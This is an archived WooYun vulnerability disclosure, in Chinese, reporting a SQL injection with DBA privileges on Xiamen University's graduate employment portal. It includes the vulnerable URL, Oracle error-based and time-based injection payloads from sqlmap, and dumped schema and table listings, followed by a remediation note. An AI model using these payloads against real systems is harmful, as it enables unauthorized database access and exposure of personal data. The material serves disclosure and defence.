乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
如题
0x01 漏洞描述
厦门大学毕业生就业指导中心,存在SQL注入,DBA权限,危害极大
0x02 漏洞地址
http://jy.xmu.edu.cn/
0x03 漏洞详细
http://jy.xmu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82
关键字:bulletinId0x04 漏洞利用工具
sqlmap
0x04 漏洞测试结果
sqlmap identified the following injection points with a total of 56 HTTP(s) requests:---Place: GETParameter: bulletinId Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: .pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82' AND 2388=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(104)||CHR(115)||CHR(105)||CHR(113)||(SELECT (CASE WHEN (2388=2388) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(118)||CHR(115)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZkjA'='ZkjA Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: .pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82' AND 7818=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(116)||CHR(83)||CHR(65),5) AND 'kEuf'='kEuf---[14:28:21] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle可知:DBA权限[14:29:28] [INFO] testing if current user is DBA[14:29:29] [WARNING] reflective value(s) found and filtering outcurrent user is DBA: True
所有数据库信息
available databases [53]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] GCAMPUS[*] GJREPORT[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] REPORT[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TS_PORTAL[*] TSMSYS[*] USR_BIEE_LIB[*] USR_BISTAR[*] USR_CCS_XMU[*] USR_CSS[*] USR_GGZXC[*] USR_GZYQ[*] USR_HR[*] USR_HU[*] USR_JY[*] USR_JY_MH[*] USR_JY_NEW[*] USR_LX[*] USR_MSG_XMU[*] USR_OA[*] USR_PHOTO[*] USR_RS[*] USR_RS_TZB[*] USR_SR_XMU[*] USR_SRNEW_DATA[*] USR_SRNEW_FJ[*] USR_SRNEW_KYRY[*] USR_SRNEW_LK[*] USR_SRNEW_WK[*] USR_TB[*] USR_TBFW[*] USR_URP[*] USR_XG[*] USR_XSZHFW[*] USR_XXZX[*] USR_XY[*] USR_YX[*] USR_ZC[*] USR_ZCGL[*] USR_ZHFW[*] WMSYS[*] XDB
随便挑一个数据表统计数据
Database: SYSTEM+---------------------------+---------+| Table | Entries |+---------------------------+---------+| HELP | 978 || LOGSTDBY$SKIP_SUPPORT | 104 || MVIEW$_ADV_PARAMETERS | 40 || REPCAT$_OBJECT_TYPES | 28 || AQ$_QUEUES | 23 || REPCAT$_RESOLUTION_METHOD | 19 || AQ$_QUEUE_TABLES | 12 || AQ$_INTERNET_AGENTS | 3 || REPCAT$_TEMPLATE_STATUS | 3 || AQ$_INTERNET_AGENT_PRIVS | 2 || REPCAT$_AUDIT_ATTRIBUTE | 2 || REPCAT$_TEMPLATE_TYPES | 2 || DEF$_DESTINATION | 1 |+---------------------------+---------+
可以获取大量信息…………不做过多测试
过滤相关参数
危害等级:中
漏洞Rank:10
确认时间:2015-12-14 10:36
已通知相关单位处理
暂无